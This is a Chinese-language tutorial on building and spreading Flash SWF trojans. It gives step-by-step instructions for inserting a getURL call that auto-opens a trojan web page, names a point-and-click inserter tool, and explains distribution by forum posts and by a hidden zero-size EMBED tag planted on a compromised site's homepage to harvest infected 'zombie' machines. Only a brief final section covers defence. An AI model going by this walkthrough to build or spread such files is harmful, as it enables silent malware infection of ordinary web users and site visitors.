在網(wǎng)站上觀看Flash動(dòng)畫，接收到“好友”發(fā)來(lái)的一張F(tuán)lash賀卡，甚至于一個(gè)QQ魔法表情，一不留神就中了一個(gè)木馬!Flash動(dòng)畫木馬可以說(shuō)是無(wú)處不在，攻擊威力和覆蓋面極其廣。許多朋友一定想了解Flash木馬的原理，想知道攻擊者是如何在SWF中插入木馬的呢?我們應(yīng)該怎么樣來(lái)防范Flash木馬呢?
一、制作Flash動(dòng)畫木馬的準(zhǔn)備
Flash動(dòng)畫木馬的原理，是在網(wǎng)頁(yè)中顯示或本地直接播放Flash動(dòng)畫木馬時(shí)，讓Flash自動(dòng)打開(kāi)一個(gè)網(wǎng)址，而該網(wǎng)址就是我們預(yù)先制作好的一個(gè)木馬網(wǎng)頁(yè)。也就是說(shuō)，在制作網(wǎng)頁(yè)木馬前，我們首先需要制作好一個(gè)網(wǎng)頁(yè)木馬，并將它放置到某個(gè)網(wǎng)站上去。
另外，我們還需要準(zhǔn)備一個(gè)比較吸引人的Flash動(dòng)畫文件“MM熱舞.swf”，以及Flash動(dòng)畫反編譯工具“閃客精靈”，編輯工具M(jìn)acromedia Flash MX。
二、最原始的Flash木馬
現(xiàn)在雖然有了許多各種各樣的Flash動(dòng)畫木馬制作工具，但是為了了解Flash動(dòng)畫木馬的最基本原理，有必要從頭開(kāi)始用最原始的方法制作一個(gè)Flash木馬。
步驟一：反編譯SWF動(dòng)畫
首先我們需要將要插入網(wǎng)頁(yè)木馬的Flash動(dòng)畫文件“MM熱舞.swf”，反編譯成可編輯的.fla格式。運(yùn)行“閃客精靈”，點(diǎn)擊菜單“文件”→“快速打開(kāi)”命令，指定“MM熱舞.swf”文件將其導(dǎo)入。然后點(diǎn)擊工具欄上的“導(dǎo)出FLA”命令，將動(dòng)畫導(dǎo)出為“MM熱舞.fla”文件。
步驟二：插入網(wǎng)頁(yè)木馬代碼
然后運(yùn)行Flash動(dòng)畫編輯器Macromedia Flash MX，點(diǎn)擊菜單“文件”→“打開(kāi)”，調(diào)入剛才保存的fla文件。展開(kāi)界面下方的“動(dòng)作/幀”欄，再展開(kāi)“動(dòng)作”→“瀏覽器/網(wǎng)絡(luò)”項(xiàng)，點(diǎn)擊其中的“getURL”命令，在右邊窗口中的“URL”里面輸入我們的網(wǎng)頁(yè)木馬地址；窗口方式為“_blank”;“變量”設(shè)置為“使用GET方式發(fā)送”，在下方的代碼窗口中將出現(xiàn)“getURL("http://網(wǎng)頁(yè)木馬地址", "_blank", "GET");”。
步驟三：生成Flash木馬
設(shè)置完畢后保存文件，并點(diǎn)擊菜單“文件”→“發(fā)布”命令，將動(dòng)畫重新導(dǎo)出為SWF格式。用IE瀏覽器打開(kāi)剛才生成的Flash動(dòng)畫木馬，可以看到隨著Flash動(dòng)畫打開(kāi)播放時(shí)，自動(dòng)彈出一個(gè)瀏覽器窗口，里面將會(huì)顯示我們的木馬網(wǎng)頁(yè)。
三、簡(jiǎn)簡(jiǎn)單單生成Flash木馬
上面插入木馬的過(guò)程比較麻煩，下面我們介紹一個(gè)簡(jiǎn)單的方法，也正是這些簡(jiǎn)單的工具使得Flash木馬在網(wǎng)上隨處可見(jiàn)。
運(yùn)行SWF木馬插入器，點(diǎn)擊界面中的“選擇”按鈕，瀏覽指定要插入木馬的SWF文件；在“插入代碼”中輸入木馬網(wǎng)頁(yè)的地址；切記不要勾選下面的“只解壓”項(xiàng)。設(shè)置完畢后，點(diǎn)擊“給我插”按鈕，程序提示開(kāi)始插入木馬網(wǎng)頁(yè)。顯示成功信息后，關(guān)閉程序，用IE打開(kāi)生成的動(dòng)畫，可以看到自動(dòng)跳轉(zhuǎn)到木馬網(wǎng)頁(yè)去了。
四、Flash木馬的利用
看到上面的步驟了吧，生成一個(gè)Flash動(dòng)畫木馬是不是很簡(jiǎn)單? 那么生成的Flash木馬該如何應(yīng)用呢?只要我們將Flash上傳到某個(gè)網(wǎng)站中，就可以通過(guò)論壇或網(wǎng)站之類的直接利用了。
大部分的論壇中都可以發(fā)來(lái)Flash動(dòng)畫的帖子，利用論壇發(fā)帖，攻擊者可以快速獲得大量的肉雞。以PHPWind v4.3.2 論壇為例，在發(fā)帖或回復(fù)時(shí)，點(diǎn)擊編輯窗口上方的“插入Flash動(dòng)畫”按鈕，設(shè)置Flash窗口大小，使用默認(rèn)設(shè)置后，要求輸入Flash的URL地址。確定后，可以看到編輯窗口中顯示的代碼為““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””，這就是完整的Flash播放代碼了，不同的論壇代碼是不一樣的。
應(yīng)用二：網(wǎng)頁(yè)嵌入Flash木馬
攻擊者入侵了某個(gè)大的網(wǎng)站之后，很可能在網(wǎng)站首頁(yè)掛馬，使用普通方式掛馬會(huì)被管理員發(fā)覺(jué)，但是掛上Flash木馬的話，是很難查殺的。攻擊者可能在網(wǎng)頁(yè)中插入如下代碼：
“《EMBED src=http://網(wǎng)頁(yè)木馬地址/木馬.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”，其中的《》改為<>。
這里的參數(shù)“width=0 height=0”表示，F(xiàn)lash播放窗口為零，也就是不顯示Flash播放窗口。其它用戶瀏覽網(wǎng)頁(yè)時(shí)，就會(huì)莫名其妙的彈出一個(gè)木馬網(wǎng)頁(yè)窗口。
五、關(guān)于Flash木馬的防范
其實(shí)不管Flash木馬有多么的巧妙，最終都是要跳轉(zhuǎn)到木馬網(wǎng)頁(yè)去的，也就是說(shuō)我們最終要防范的還是網(wǎng)頁(yè)木馬。了解了思路，對(duì)于Flash動(dòng)畫木馬就簡(jiǎn)單了：
首先，要開(kāi)啟Windows XP SP2的窗口攔截窗口功能，或安裝其它防彈出窗口的插件。如果那個(gè)漏網(wǎng)之魚，莫名其妙彈出的網(wǎng)頁(yè)窗口要及時(shí)的關(guān)閉。另外，一定要在上網(wǎng)瀏覽時(shí)開(kāi)啟殺毒軟件的網(wǎng)頁(yè)監(jiān)控功能，只要網(wǎng)頁(yè)木馬在后臺(tái)一下載到本地硬盤，就會(huì)被殺毒軟件查殺，這樣就萬(wàn)事無(wú)憂了!
PS:本文中對(duì)代碼做了一些處理。